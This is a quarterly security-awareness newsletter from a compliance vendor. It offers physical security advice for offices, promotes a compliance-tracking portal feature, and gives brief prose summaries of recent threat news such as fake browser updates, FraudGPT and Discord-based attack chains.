TCT is committed to helping you keep your organization secure and compliant. Every quarter, we publish compliance and security insights that you can share with your employees to fulfill periodic security reminder requirements your organization may be subject to.
As an added bonus, we’ve highlighted some developing security trends and featured a quick tip to get more out of your compliance management.
Physical Security is Important!
It’s not uncommon for me to do an on-site visit for a client and discover basic physical security failures that need to be addressed. These are items as simple as having adequate locking mechanisms on doors, or installing security cameras.
Physical security is a critical part of effective cybersecurity. If your organization is going to protect your sensitive information, you’ll need to be vigilant in enforcing the following best practices.
Cover all locations
Consider every facility your organization is responsible for — including those one-person sales offices. Don’t disregard those tiny satellite offices, just because there are only one or two people manning them. As they say, it isn’t the size of the office, it’s what you do with it.
Any office with connectivity to your main network is a potential security risk, and you need to pay attention to its physical security. Bad actors will see a vulnerable small office as an easy entryway into your entire network.
Secure every entrance and exit
Verify that each of your locking mechanisms on your doors is functioning properly. Make sure that you have monitoring for every entrance and exit.
Have modes of authentication for people entering and leaving the building (e.g., badge entry). Install cameras at each of the entrances, not just the main entrance. If someone wants to get unauthorized access to your building, they’ll be willing to go through unauthorized entrances — including emergency exits, windows, and rooftop access points.
Never let anyone piggyback their way into your facility. Employees should never hold the door open for someone coming into the building — even if it’s an employee they know, because that employee could have been fired the day before and lost their access.
There should be a visitor badging system for your building. If any of your employees sees a visitor without their badge, the employee should stop them and ask, “Who are you here to see? How can I help you?” Then escort the visitor back to the front desk and get them signed in.
What about leased buildings?
I often hear the comment, “We lease that building, so it’s not my responsibility to take care of its physical security.” Chances are, the owner of that building doesn’t have a clue that there’s a security issue. It’s your business that’s occupying the building, so there’s a shared responsibility. It’s your stuff you need to protect.
It may be someone else’s building but the impact of a breach is going to fall to you. So report these shortcomings to your landlord to get them on the list to be addressed.
Do your facilities have adequate physical security? Dive deeper: There Is No Cybersecurity Without Physical Security Best Practices
Quick Tip: TCT Portal’s Operational Mode Covers Your A$$ After Achieving Compliance
Once you’ve achieved compliance with a certification, you aren’t done with it. You’re obligated to maintain compliance with routine activities that fall on daily, weekly, monthly, quarterly, semi-annual and annual cadences.
TCT Portal’s Operational Mode makes these responsibilities easier. Operational Mode uses automation to help ensure that you never miss one of your ongoing compliance maintenance responsibilities.
I’ve seen organizations with lapses in their operational compliance requirements, such as quarterly vulnerability scans. When they head into their annual Assessment, their Assessor says, “I’m sorry, but we can’t sign off on your annual assessment until you have four quarterly scans.” If you miss a scan in the third quarter, the Assessor can’t sign off on your PCI for another six months.
Operational Mode serves those periodic time-based tasks to the appropriate people on your team. It allows you to be proactive with your evidence gathering, lets you see everything that’s overdue, and enables you to sort all the tasks by due date. With just a glance, project managers can easily track what’s coming up, when it’s due, who it’s assigned to, and whether or not it’s been completed.
You’re never left wondering what the current state of your compliance management looks like — it’s clear as day.
What’s Going on in Security Today
Fake Browser Updates Used in Malware Distribution
There has been an upward trend in exploiting the human mind with safe, known software, and installing malicious updates. Using fake browser updates on compromised websites, threat actors like TA569 have been using JavaScript and HTML-injected code to deliver the SocGholish malware, posing as a legitimate software update for web browsers.
This essentially lies to users and their trust of main browsers, and is a way to subvert organizations and their Security Awareness Training mechanisms.
NSA and CISA Advise on Top Ten Cybersecurity Misconfigurations
The NSA, CISA, and FBI have jointly released a list of their Top Ten most common cybersecurity misconfigurations. Some of the top ten included using default software or hardware credentials when deploying hardware or software, weak Two-Factor/Multi-Factor authentication mechanisms, and unrestricted code execution (Software). This list of ten things will greatly help reduce an organization’s attack surface and vectors for the attack.
Five Eyes intelligence chiefs warn China is using AI to steal intellectual property
Five Eyes intelligence network, composed of US, Britain, Canada, Australia, and New Zealand, have issued a joint statement that China is using AI to assist their state-sponsored hackers to hack and spy against not only the Five Eyes countries, but the rest of the world.
This is not just limited to homes or small businesses. There are reports that companies working on robotics, biotech, AI, and even quantum technology have been targeted by China and their cyber networks, assisted by AI to speed up their queries, without decreasing performance on their side to carry out these virtual incursions.
FBI director Christopher Wray has stated that it is known by Five Eyes that China has “a bigger hacking program,” physical or virtual, than that of every other major power nation combined. The scale of the attacks makes it that much more challenging to thwart.
Exploring the Realm of Malicious Generative AI: A New Digital Security Challenge
Malicious AI is already starting to blossom among the number of AI solutions currently in place. FraudGPT has the ability to craft spear-phishing campaigns, creating counterfeit invoices, and fake news articles, among other things. It’s all for the sake of taking down organizations and exploiting/defrauding employees and even upper management.
These types of malicious attacks can shift public opinion on topics, and even be exploited in cyber-attacks.
Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure
Discord is one of the most popular communication software applications on the market today. Therefore, it is a lucrative attack target, as well as a useful tool to use to launch attacks from. Using functionality already in the Discord server, such as its webhook, the attacker can have a rigged website that results in scripts that extract and run PowerShell scripts to download another PS script from a web-based Git-Hub repository.
The initial file is not that dangerous, but once the task has been performed once, the attacker can modify the GitHub script to make it more malicious and do damage, even to the point of physical hardware harm.
Get industry insider expertise delivered to your inbox
Subscribe to the TCT blog